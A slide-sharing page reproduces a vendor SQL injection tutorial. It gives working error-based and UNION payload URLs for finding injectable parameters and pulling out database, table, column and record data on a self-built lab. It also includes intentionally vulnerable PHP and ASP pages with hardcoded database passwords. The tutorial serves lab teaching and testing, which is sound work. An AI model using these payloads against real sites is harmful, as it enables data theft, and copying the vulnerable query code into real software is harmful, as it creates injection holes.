Magno Logan, profile picture
Uploaded byMagno Logan
4,847 views

SQL Injection Tutorial

This document provides a tutorial on SQL injection, including: - Explaining what SQL injection is and how it works by exploiting vulnerabilities in database queries - Steps to test for SQL injection vulnerabilities like determining the database type and getting environment information - Methods for extracting data through SQL injection like getting database, table, and column names and record data - Recommending the use of automated SQL injection scanning tools like WebCruiser to more efficiently test for and exploit SQL injection vulnerabilities - Instructions for setting up sample PHP/MySQL and ASP/SQL Server testing environments to practice SQL injection techniques

Embed presentation

Downloaded 178 times
SQL Injection Tutorial SQL Injection Tutorial Table of Content 1 What is SQL Injection...............................................................................................................2 2 SQL Injection Tutorial..............................................................................................................2 2.1 Get Environment Information ..........................................................................................2 2.1.1 Injectable or Not?.........................................................................................................2 2.1.2 Get SQL Injection KeyWord........................................................................................5 2.1.3 Get Database Type .......................................................................................................6 2.1.4 Method of Getting Data................................................................................................7 2.2 Get Data by SQL Injection...............................................................................................8 2.2.1 Get Dabase Name.........................................................................................................8 2.2.2 Get Table Name .........................................................................................................11 2.2.3 Get Column Name......................................................................................................12 2.2.4 Get Data Record.........................................................................................................14 2.3 SQL Injection Tool.........................................................................................................15 3 Build Typical Test Environment.............................................................................................17 3.1 PHP+MySQL Test Environment....................................................................................17 3.2 ASP/ASPX+SQL Server Test Environment ..................................................................19 4 References...............................................................................................................................21 By Janus Security Software (http://www.janusec.com/ )
SQL Injection Tutorial 1 What is SQL Injection SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL Injection is one of the most common application layer attack techniques used today. 2 SQL Injection Tutorial If you have no pages with SQL Injection vulnerability for test, please built one of your own according to chapter 3 – Build Typical Test Environment. Here let‟s begin our SQL Injection Tutorial. 2.1 Get Environment Information Example 1: http://192.168.254.21:79/sql.asp?uid=1 Example 2: http://192.168.254.21/mysql.php?username=bob You can get it in chapter 3 – Build Typical Test Environment. 2.1.1 Injectable or Not? Example 1: (1)Normal Request and named Response0 for the result: http://192.168.254.21:79/sql.asp?uid=1
SQL Injection Tutorial (2) Add true condition (1=1) and named Response1 for the result: http://192.168.254.21:79/sql.asp?uid=1 and 1=1 (3) Add false condition (1=2) and named Response2 for the result: http://192.168.254.21:79/sql.asp?uid=1 and 1=2 Usually, if Response1=Response0 And Response1! = Response2, It means there is SQL Injection vulnerability. Example 2:
SQL Injection Tutorial Response0: http://192.168.254.21/mysql.php?username=bob Response1: Response1 is not equal to Response0, notice that bob is a string, not an integer, so try: Response1: http://192.168.254.21/mysql.php?username=bob' and '1'='1 Now Response1 is equal to Response0, continue: Response2: http://192.168.254.21/mysql.php?username=bob' and '1'='2
SQL Injection Tutorial Response1=Response0 And Response1! = Response2, It means there is SQL Injection vulnerability. In some cases, even the parameter is an integer, it need a single quote to match the SQL sentence. 2.1.2 Get SQL Injection KeyWord SQL Injection Keyword is a word or phrase that only occurred in Response1 but not occurred in Response2. SQL Injection Keyword used by SQL Injection Scanners, for example WebCruiser Web Vulnerability Scanner (http://sec4app.com/ ). In example 1 and example 2, the keyword may be username, Description etc.
SQL Injection Tutorial In the following SQL Injection process, if Response1 include the keyword but Response2 not, we can judge that the response1 using a true condition. 2.1.3 Get Database Type Sometimes, you can simply get the database type by add a single quote to produce an error: http://192.168.254.21:79/sql.asp?uid=1' http://192.168.254.21/mysql.php?username=bob' But usually, you need use database specified syntax to get the type, it becomes complex. Or you can use a SQL Injection Scanner to do it. In example 1, try to get database name by: http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0
SQL Injection Tutorial db_name() is a function of SQL Server, but not include in MySQL, http://192.168.254.21/mysql.php?username=bob'and db_name()>0 and '1'='1 Try: http://192.168.254.21/mysql.php?username=bob' and (select length(user()))>0 and '1'='1 Because (select length(user())) is valid in MySQL, so we can guess it is using MySQL. 2.1.4 Method of Getting Data There are many methods to getting data in SQL Injection, but not all these methods are supported in an actual penetration test. These methods include:  Plain text error (To produce an error and get information from the error message);  Union replace (Using null union select column from table to replace the response);  Blind SQL Injection (Using ASCII comparison when no error message response);  Cross-site SQL Injection (To send the information to a third site);
SQL Injection Tutorial  Time delay (To produce time-consuming SQL sentence and get information from the response time). In example 1, response of http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0 include the database name “test”, so you can get data by plain text error. In example 2, response of http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select char(65,65,65),1%23 include “AAA” (char(65,65,65)), so you can get data by Union replace. 2.2 Get Data by SQL Injection 2.2.1 Get Dabase Name Example 1: Get Current Database: http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0
SQL Injection Tutorial Get All Databases: Get Database Number: 10 http://192.168.254.21:79/sql.asp?uid=1 and (char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [master]..[sysdatabases]) as varchar(8))))>0 Get each database name: master, tempdb, etc. by changing the value of dbid. http://192.168.254.21:79/sql.asp?uid=1 and (char(65)%2Bchar(65)%2Bchar(65)%2B(select name from [master]..[sysdatabases] where dbid=1))>0 http://192.168.254.21:79/sql.asp?uid=1 and (char(65)%2Bchar(65)%2Bchar(65)%2B(select name from [master]..[sysdatabases] where dbid=2))>0 Example 2:
SQL Injection Tutorial Get Current Database: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select database(),1 %23 Get All Databases: Get databases number: 18 http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat(char(65,65,65),cast((select count(SCHEMA_NAME) from information_schema.SCHEMATA) as char)),1 %23 Get each database: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select SCHEMA_NAME,1 from information_schema.SCHEMATA limit 0,1%23 http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select SCHEMA_NAME,1 from information_schema.SCHEMATA limit 17,1%23
SQL Injection Tutorial 2.2.2 Get Table Name Example 1: Get Table Number: 6 http://192.168.254.21:79/sql.asp?uid=1 and char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [Test]..[sysobjects] where xtype=0x55) as varchar(8)))>0 Get each table: http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 name from(Select top 1 id,name from [Test]..[sysobjects] where xtype=0x55 order by id) T order by id desc)>0 … http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 name from(Select top 4 id,name from [Test]..[sysobjects] where xtype=0x55 order by id) T order by id desc)>0 Example 2: Get Table Number: 5 http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat(char(65,65,65),cast((select count(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=char(116,101,115,116)) as
SQL Injection Tutorial char)),1 %23 Get each table: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select TABLE_NAME,1 from information_schema.tables where TABLE_SCHEMA=char(116,101,115,116) limit 2,1%23 2.2.3 Get Column Name Example 1, Get Column Number of table „t1‟: 3 http://192.168.254.21:79/sql.asp?uid=1 and char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [Test].information_schema.columns where table_name=0x74003100) as varchar(8)))>0
SQL Injection Tutorial Get each column: http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 column_name from [Test].information_schema.columns where table_name=0x74003100 and ordinal_position=1)>0 http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 column_name from [Test].information_schema.columns where table_name=0x74003100 and ordinal_position=2)>0 Example 2: Get column number: 2 http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat(char(65,65,65),cast((select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=char(116,101,115,116) and TABLE_NAME=char(116,49)) as char)),1 %23
SQL Injection Tutorial Get each column: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select COLUMN_NAME,1 from information_schema.COLUMNS where TABLE_SCHEMA=char(116,101,115,116) and TABLE_NAME=char(116,49) limit 0,1%23 2.2.4 Get Data Record Example 1, http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 isnull(cast([username] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([uid] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([des] as nvarchar(4000)),char(32)) from (select top 1 [username],[uid],[des] from [Test]..[t1] order by [username]) T order by [username] desc)>0
SQL Injection Tutorial http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 isnull(cast([username] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([uid] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([des] as nvarchar(4000)),char(32)) from (select top 2 [username],[uid],[des] from [Test]..[t1] order by [username]) T order by [username] desc)>0 Example 2: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat_ws(char(94),ifnull(cast(`user` as char),char(32)),ifnull(cast(`des` as char),char(32))),1 from test.t1 limit 4,1%23 2.3 SQL Injection Tool This SQL Injection Tutorial describes how to use SQL Injection manually, but it is inefficient step by step. An automatic SQL Injection Scanner and SQL Injection Tool are preferred. WebCruiser Web Vulnerability Scanner is such an effective penetration testing tool for you.
SQL Injection Tutorial WebCruiser - Web Vulnerability Scanner, an effective and powerful web penetration testing tool that will aid you in auditing your website! It has a Vulnerability Scanner and a series of security tools include SQL Injection Tool, Cross Site Scripting Tool, XPath Injection Tool etc. WebCruiser can support scanning website as well as POC (Proof of concept) for web vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also an automatic SQL injection tool, an XPath injection tool, and a Cross Site Scripting tool! Key Features: * Crawler (Site Directories and Files); * Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection etc.; * SQL Injection Scanner; * SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept); * SQL Injection for SQL Server: PlainText/Union/Blind Injection; * SQL Injection for MySQL: PlainText/Union/Blind Injection; * SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection; * SQL Injection for DB2: Union/Blind Injection;
SQL Injection Tutorial * SQL Injection for Access: Union/Blind Injection; * Post Data Resend; * Cross Site Scripting Scanner and POC; * XPath Injection Scanner and POC; * Auto Get Cookie From Web Browser For Authentication; * Report Output. System Requirement: Windows 7/Vista, or Windows XP with .Net Framework 2.0 Download WebCruiser from http://sec4app.com or http://www.janusec.com . 3 Build Typical Test Environment 3.1 PHP+MySQL Test Environment XAMPP (http://sourceforge.net/projects/xampp/) will help you build a PHP+MySQL environment simply. Create database `test` and table `t1` and add records, here is the description:
SQL Injection Tutorial Create a file named mysql.php: <?php $username=$_GET['username']; if($username) { $conn=mysql_connect("127.0.0.1","root","123456") or die('Error: ' . mysql_error()); mysql_select_db("test"); $SQL="select * from t1 where user='".$username."'"; //echo "SQL=".$SQL."<br>"; $result=mysql_query($SQL) or die('Error: ' . mysql_error());; $row=mysql_fetch_array($result); if($row['user']) { echo "Username:".$row['user']."<br>"; echo "Description:".$row['des']."<br>"; echo "TestOK!<br>"; } else echo "No Record!"; mysql_free_result($result); mysql_close(); } ?> Place mysql.php to the folder htdocs and navigate
SQL Injection Tutorial http://192.168.254.21/mysql.php?username=bob 3.2 ASP/ASPX+SQL Server Test Environment Create database test and table t1: Create sql.asp: <script language=javascript runat=server> var dbConn = Server.CreateObject("ADODB.Connection"); dbConn.open("Provider=sqloledb;Data Source=localhost;Initial Catalog=test;User Id=sa;Password=123456;" ); rs = Server.CreateObject("ADODB.RecordSet"); uid= Request.Querystring("uid"); rs.open("select * from t1 where uid="+uid,dbConn,3); Response.write("<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>Test</title></head>"); if(rs.RecordCount < 1) { Response.write("<p>No Record!</p>"); } else {
SQL Injection Tutorial Response.write("<table border=1 width=800 cellspacing=0 bordercolordark=009099>"); Response.write("<tr><td><b>uid</b></td><td><b>username</b></td><td><b>Description</b></td>"); for(var i = 1;i <= rs.RecordCount;i++) { if(!rs.Eof) { Response.write("<tr>"); Response.write("<td><span style='font-size:9t'>"+rs("uid")+"</span></td>"); Response.write("<td><span style='font-size:9t'>"+rs("username")+"</span></td>"); Response.write("<td><span style='font-size:9t'>"+rs("des")+"</span></td>"); Response.write("</tr>"); rs.MoveNext(); } } } Response.write("</html>"); rs.close(); dbConn.close(); </script> Navigate http://192.168.254.21:79/sql.asp?uid=1
SQL Injection Tutorial 4 References 1. SQL Injection, http://sec4app.com/download/SqlInjection.pdf 2. WebCruiser Web Vulnerability Scanner User Guide, http://sec4app.com/download/WebCruiserUserGuide.pdf 3. Janus Security Software, http://www.janusec.com/ 4. WebCruiser, http://sec4app.com/

More Related Content

PDF
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
PPT
SQL Injection
byAdhoura Academy
 
PPTX
SQL injection
byRaj Parmar
 
PDF
Sql Injection - Vulnerability and Security
bySandip Chaudhari
 
PDF
Api security-testing
byn|u - The Open Security Community
 
PPTX
Sql injection
byZidh
 
PDF
How to identify and prevent SQL injection
byEguardian Global Services
 
PDF
JSON Web Token
byDeddy Setyadi
 
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
SQL Injection
byAdhoura Academy
 
SQL injection
byRaj Parmar
 
Sql Injection - Vulnerability and Security
bySandip Chaudhari
 
Api security-testing
byn|u - The Open Security Community
 
Sql injection
byZidh
 
How to identify and prevent SQL injection
byEguardian Global Services
 
JSON Web Token
byDeddy Setyadi
 

What's hot

PPTX
Sql injection - security testing
byNapendra Singh
 
PDF
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
byMarco Balduzzi
 
PPTX
02. input validation module v5
byEoin Keary
 
PPTX
Basics of Server Side Template Injection
byVandana Verma
 
PPTX
Sql injection
byNuruzzaman Milon
 
PPTX
SQL Injection
byAsish Kumar Rath
 
PPTX
Spring Boot
byJiayun Zhou
 
PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
PPT
Advanced SQL Injection
byamiable_indian
 
PDF
[OPD 2019] Attacking JWT tokens
byOWASP
 
PPTX
Pentesting Modern Web Apps: A Primer
byBrian Hysell
 
PPTX
Whatis SQL Injection.pptx
bySimplilearn
 
PPTX
Directory Traversal & File Inclusion Attacks
byRaghav Bisht
 
PPTX
Sql injections - with example
byPrateek Chauhan
 
PPTX
Sql injection in cybersecurity
bySanad Bhowmik
 
PPTX
Attacking thru HTTP Host header
bySergey Belov
 
PDF
Simplified Security Code Review Process
bySherif Koussa
 
PPT
Secure code practices
byHina Rawal
 
PDF
Ekoparty 2017 - The Bug Hunter's Methodology
bybugcrowd
 
PPTX
Input Validation
byprimeteacher32
 
Sql injection - security testing
byNapendra Singh
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
byMarco Balduzzi
 
02. input validation module v5
byEoin Keary
 
Basics of Server Side Template Injection
byVandana Verma
 
Sql injection
byNuruzzaman Milon
 
SQL Injection
byAsish Kumar Rath
 
Spring Boot
byJiayun Zhou
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
Advanced SQL Injection
byamiable_indian
 
[OPD 2019] Attacking JWT tokens
byOWASP
 
Pentesting Modern Web Apps: A Primer
byBrian Hysell
 
Whatis SQL Injection.pptx
bySimplilearn
 
Directory Traversal & File Inclusion Attacks
byRaghav Bisht
 
Sql injections - with example
byPrateek Chauhan
 
Sql injection in cybersecurity
bySanad Bhowmik
 
Attacking thru HTTP Host header
bySergey Belov
 
Simplified Security Code Review Process
bySherif Koussa
 
Secure code practices
byHina Rawal
 
Ekoparty 2017 - The Bug Hunter's Methodology
bybugcrowd
 
Input Validation
byprimeteacher32
 

Viewers also liked

PDF
Qualitative data analysis
byTilahun Nigatu Haregu
 
DOCX
Types of sql injection attacks
byRespa Peter
 
PPTX
Sql Injection attacks and prevention
byhelloanand
 
PPTX
From KPIs to dashboards
byAni Lopez
 
PPT
Sql injection
byPallavi Biswas
 
PPTX
SQL Injections - A Powerpoint Presentation
byRapid Purple
 
Qualitative data analysis
byTilahun Nigatu Haregu
 
Types of sql injection attacks
byRespa Peter
 
Sql Injection attacks and prevention
byhelloanand
 
From KPIs to dashboards
byAni Lopez
 
Sql injection
byPallavi Biswas
 
SQL Injections - A Powerpoint Presentation
byRapid Purple
 

Similar to SQL Injection Tutorial

PPT
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
PDF
Sq linjection
byMahesh Gupta (DBATAG) - SQL Server Consultant
 
PPTX
SQL Injection Stegnography in Pen Testing
by191013607gouthamsric
 
PPT
Sql injection
byNitish Kumar
 
PDF
Chapter 14 sql injection
bynewbie2019
 
PDF
Full MSSQL Injection PWNage
byPrathan Phongthiproek
 
PDF
Sql injection
bySafwan Hashmi
 
PPTX
SQL INJECTION
byAnoop T
 
PPTX
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
PPT
Sql Injection Adv Owasp
byAung Khant
 
PPTX
SQL Injection Sql Injection Typesagdsgdsgdsgbdshfdshbfdshbfdshbfdhsh
byRAKIBULISLAM529074
 
PDF
Ceh v5 module 14 sql injection
byVi Tính Hoàng Nam
 
PPT
SQL injection and buffer overflows are hacking techniques used to exploit wea...
bybankservicehyd
 
PPT
Advanced sql injection 1
byKarunakar Singh Thakur
 
PPTX
Code injection and green sql
byKaustav Sengupta
 
PPTX
Greensql2007
byKaustav Sengupta
 
PPT
SQLSecurity.ppt
byLokeshK66
 
PPT
SQLSecurity.ppt
byCNSHacking
 
PDF
sql-inj_attack.pdf
byssuser07cf8b
 
PDF
My app is secure... I think
byWim Godden
 
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
Sq linjection
byMahesh Gupta (DBATAG) - SQL Server Consultant
 
SQL Injection Stegnography in Pen Testing
by191013607gouthamsric
 
Sql injection
byNitish Kumar
 
Chapter 14 sql injection
bynewbie2019
 
Full MSSQL Injection PWNage
byPrathan Phongthiproek
 
Sql injection
bySafwan Hashmi
 
SQL INJECTION
byAnoop T
 
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
Sql Injection Adv Owasp
byAung Khant
 
SQL Injection Sql Injection Typesagdsgdsgdsgbdshfdshbfdshbfdshbfdhsh
byRAKIBULISLAM529074
 
Ceh v5 module 14 sql injection
byVi Tính Hoàng Nam
 
SQL injection and buffer overflows are hacking techniques used to exploit wea...
bybankservicehyd
 
Advanced sql injection 1
byKarunakar Singh Thakur
 
Code injection and green sql
byKaustav Sengupta
 
Greensql2007
byKaustav Sengupta
 
SQLSecurity.ppt
byLokeshK66
 
SQLSecurity.ppt
byCNSHacking
 
sql-inj_attack.pdf
byssuser07cf8b
 
My app is secure... I think
byWim Godden
 

More from Magno Logan

PDF
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
byMagno Logan
 
PDF
Katana Security - Consultoria em Segurança da Informação
byMagno Logan
 
PDF
OWASP Top 10 2010 para JavaEE (pt-BR)
byMagno Logan
 
PDF
XST - Cross Site Tracing
byMagno Logan
 
PDF
OWASP Top 10 2007 for JavaEE
byMagno Logan
 
PDF
XPath Injection
byMagno Logan
 
PDF
SQL Injection
byMagno Logan
 
ODT
OWASP Top 10 2010 pt-BR
byMagno Logan
 
PPT
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
byMagno Logan
 
PPTX
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
byMagno Logan
 
PPTX
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
byMagno Logan
 
PDF
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
byMagno Logan
 
PPT
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
byMagno Logan
 
PDF
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
byMagno Logan
 
PDF
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
byMagno Logan
 
PPT
AppSec DC 2009 - Learning by breaking by Chuck Willis
byMagno Logan
 
PDF
Just4Meeting 2012 - How to protect your web applications
byMagno Logan
 
PPTX
GTS 17 - OWASP em prol de um mundo mais seguro
byMagno Logan
 
PDF
ENSOL 2011 - OWASP e a Segurança na Web
byMagno Logan
 
PDF
BHack 2012 - How to protect your web applications
byMagno Logan
 
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
byMagno Logan
 
Katana Security - Consultoria em Segurança da Informação
byMagno Logan
 
OWASP Top 10 2010 para JavaEE (pt-BR)
byMagno Logan
 
XST - Cross Site Tracing
byMagno Logan
 
OWASP Top 10 2007 for JavaEE
byMagno Logan
 
XPath Injection
byMagno Logan
 
SQL Injection
byMagno Logan
 
OWASP Top 10 2010 pt-BR
byMagno Logan
 
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
byMagno Logan
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
byMagno Logan
 
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
byMagno Logan
 
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
byMagno Logan
 
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
byMagno Logan
 
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
byMagno Logan
 
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
byMagno Logan
 
AppSec DC 2009 - Learning by breaking by Chuck Willis
byMagno Logan
 
Just4Meeting 2012 - How to protect your web applications
byMagno Logan
 
GTS 17 - OWASP em prol de um mundo mais seguro
byMagno Logan
 
ENSOL 2011 - OWASP e a Segurança na Web
byMagno Logan
 
BHack 2012 - How to protect your web applications
byMagno Logan
 

Recently uploaded

PDF
December Patch Tuesday
byIvanti
 
PDF
Guided Substation Engineering with CoMPAS: Simplifying IEC 61850
byDanBrown980551
 
PDF
Safeguarding AI-Based Financial Infrastructure
byYasir Naveed Riaz
 
PDF
Empowering Productivity with Clever Prompts and Intelligent Agents
byUni Systems S.M.S.A.
 
PDF
Generative AI in 2026: Hype, Bubble, Winter or The Real Deal?
byDr. Tathagat Varma
 
PDF
Top Cybersecurity Threats 2025 Guide by Sureshdas
byPrintersassist
 
PDF
eResource Scheduler Enterprise Resource Management and Scheduling Software.pdf
byeResource Scheduler
 
PDF
Unlocking the Power of Salesforce Architecture: Frameworks for Effective Solu...
byvarsha30tiwari
 
PPTX
RISE with SAP for Automotive - S4 HANA Value.pptx
byAmira Jemi
 
PPTX
Ritesh_kumar_Aatmanirbhar Bharat: Make in India, Make for the World.pptx
byriteshrkgs2008
 
PDF
Unser Jahresrückblick – MarvelClient in 2025
bypanagenda
 
PDF
Making Sense of Raster: From Bit Depth to Better Workflows
bySafe Software
 
PDF
Agentic Automation for Testers – A Hands-On Deep Dive
byUiPathCommunity
 
PDF
Security Technologys: Access Control, Firewall, VPN
byShielaLasala
 
PDF
Decoding the DNA: The Digital Networks Act, the Open Internet, and IP interco...
byCSUC - Consorci de Serveis Universitaris de Catalunya
 
PDF
The year in review - MarvelClient in 2025
bypanagenda
 
PDF
The Ultimate Guide to Problem Management Dashboards for IT Teams.pdf
byomnex systems
 
PDF
Ransomware_Resilience_Strategic_Playbook.pdf
byAfonso Henrique Rodrigues Alves
 
PDF
Accelerating Responsible AI Adoption in Public Sector and Private Organizations.
byYasir Naveed Riaz
 
PPTX
The Landscape of Computer Software Development Companies
byYash Singh
 
December Patch Tuesday
byIvanti
 
Guided Substation Engineering with CoMPAS: Simplifying IEC 61850
byDanBrown980551
 
Safeguarding AI-Based Financial Infrastructure
byYasir Naveed Riaz
 
Empowering Productivity with Clever Prompts and Intelligent Agents
byUni Systems S.M.S.A.
 
Generative AI in 2026: Hype, Bubble, Winter or The Real Deal?
byDr. Tathagat Varma
 
Top Cybersecurity Threats 2025 Guide by Sureshdas
byPrintersassist
 
eResource Scheduler Enterprise Resource Management and Scheduling Software.pdf
byeResource Scheduler
 
Unlocking the Power of Salesforce Architecture: Frameworks for Effective Solu...
byvarsha30tiwari
 
RISE with SAP for Automotive - S4 HANA Value.pptx
byAmira Jemi
 
Ritesh_kumar_Aatmanirbhar Bharat: Make in India, Make for the World.pptx
byriteshrkgs2008
 
Unser Jahresrückblick – MarvelClient in 2025
bypanagenda
 
Making Sense of Raster: From Bit Depth to Better Workflows
bySafe Software
 
Agentic Automation for Testers – A Hands-On Deep Dive
byUiPathCommunity
 
Security Technologys: Access Control, Firewall, VPN
byShielaLasala
 
Decoding the DNA: The Digital Networks Act, the Open Internet, and IP interco...
byCSUC - Consorci de Serveis Universitaris de Catalunya
 
The year in review - MarvelClient in 2025
bypanagenda
 
The Ultimate Guide to Problem Management Dashboards for IT Teams.pdf
byomnex systems
 
Ransomware_Resilience_Strategic_Playbook.pdf
byAfonso Henrique Rodrigues Alves
 
Accelerating Responsible AI Adoption in Public Sector and Private Organizations.
byYasir Naveed Riaz
 
The Landscape of Computer Software Development Companies
byYash Singh
 
In this document
Powered by AI

Introduction to SQL Injection, its significance and a structured content outline.

Explanation of SQL injection as a code injection technique and its risks.

Techniques to determine if a SQL Injection vulnerability exists using true/false conditions.

Use of keywords in SQL injections and methods to identify database types.

Steps on retrieving database names, tables, and columns using SQL Injection.

Methods to retrieve data records from a database using SQL Injection.

Overview of SQL Injection tools like WebCruiser for automating the attack.

Guide on setting up PHP+MySQL and ASP/ASPX+SQL Server environments for testing.

List of references for further reading on SQL Injection and related tools.

SQL Injection Tutorial

  • 1.
    SQL Injection Tutorial SQLInjection Tutorial Table of Content 1 What is SQL Injection...............................................................................................................2 2 SQL Injection Tutorial..............................................................................................................2 2.1 Get Environment Information ..........................................................................................2 2.1.1 Injectable or Not?.........................................................................................................2 2.1.2 Get SQL Injection KeyWord........................................................................................5 2.1.3 Get Database Type .......................................................................................................6 2.1.4 Method of Getting Data................................................................................................7 2.2 Get Data by SQL Injection...............................................................................................8 2.2.1 Get Dabase Name.........................................................................................................8 2.2.2 Get Table Name .........................................................................................................11 2.2.3 Get Column Name......................................................................................................12 2.2.4 Get Data Record.........................................................................................................14 2.3 SQL Injection Tool.........................................................................................................15 3 Build Typical Test Environment.............................................................................................17 3.1 PHP+MySQL Test Environment....................................................................................17 3.2 ASP/ASPX+SQL Server Test Environment ..................................................................19 4 References...............................................................................................................................21 By Janus Security Software (http://www.janusec.com/ )
  • 2.
    SQL Injection Tutorial 1What is SQL Injection SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL Injection is one of the most common application layer attack techniques used today. 2 SQL Injection Tutorial If you have no pages with SQL Injection vulnerability for test, please built one of your own according to chapter 3 – Build Typical Test Environment. Here let‟s begin our SQL Injection Tutorial. 2.1 Get Environment Information Example 1: http://192.168.254.21:79/sql.asp?uid=1 Example 2: http://192.168.254.21/mysql.php?username=bob You can get it in chapter 3 – Build Typical Test Environment. 2.1.1 Injectable or Not? Example 1: (1)Normal Request and named Response0 for the result: http://192.168.254.21:79/sql.asp?uid=1
  • 3.
    SQL Injection Tutorial (2)Add true condition (1=1) and named Response1 for the result: http://192.168.254.21:79/sql.asp?uid=1 and 1=1 (3) Add false condition (1=2) and named Response2 for the result: http://192.168.254.21:79/sql.asp?uid=1 and 1=2 Usually, if Response1=Response0 And Response1! = Response2, It means there is SQL Injection vulnerability. Example 2:
  • 4.
    SQL Injection Tutorial Response0: http://192.168.254.21/mysql.php?username=bob Response1: Response1is not equal to Response0, notice that bob is a string, not an integer, so try: Response1: http://192.168.254.21/mysql.php?username=bob' and '1'='1 Now Response1 is equal to Response0, continue: Response2: http://192.168.254.21/mysql.php?username=bob' and '1'='2
  • 5.
    SQL Injection Tutorial Response1=Response0 AndResponse1! = Response2, It means there is SQL Injection vulnerability. In some cases, even the parameter is an integer, it need a single quote to match the SQL sentence. 2.1.2 Get SQL Injection KeyWord SQL Injection Keyword is a word or phrase that only occurred in Response1 but not occurred in Response2. SQL Injection Keyword used by SQL Injection Scanners, for example WebCruiser Web Vulnerability Scanner (http://sec4app.com/ ). In example 1 and example 2, the keyword may be username, Description etc.
  • 6.
    SQL Injection Tutorial Inthe following SQL Injection process, if Response1 include the keyword but Response2 not, we can judge that the response1 using a true condition. 2.1.3 Get Database Type Sometimes, you can simply get the database type by add a single quote to produce an error: http://192.168.254.21:79/sql.asp?uid=1' http://192.168.254.21/mysql.php?username=bob' But usually, you need use database specified syntax to get the type, it becomes complex. Or you can use a SQL Injection Scanner to do it. In example 1, try to get database name by: http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0
  • 7.
    SQL Injection Tutorial db_name()is a function of SQL Server, but not include in MySQL, http://192.168.254.21/mysql.php?username=bob'and db_name()>0 and '1'='1 Try: http://192.168.254.21/mysql.php?username=bob' and (select length(user()))>0 and '1'='1 Because (select length(user())) is valid in MySQL, so we can guess it is using MySQL. 2.1.4 Method of Getting Data There are many methods to getting data in SQL Injection, but not all these methods are supported in an actual penetration test. These methods include:  Plain text error (To produce an error and get information from the error message);  Union replace (Using null union select column from table to replace the response);  Blind SQL Injection (Using ASCII comparison when no error message response);  Cross-site SQL Injection (To send the information to a third site);
  • 8.
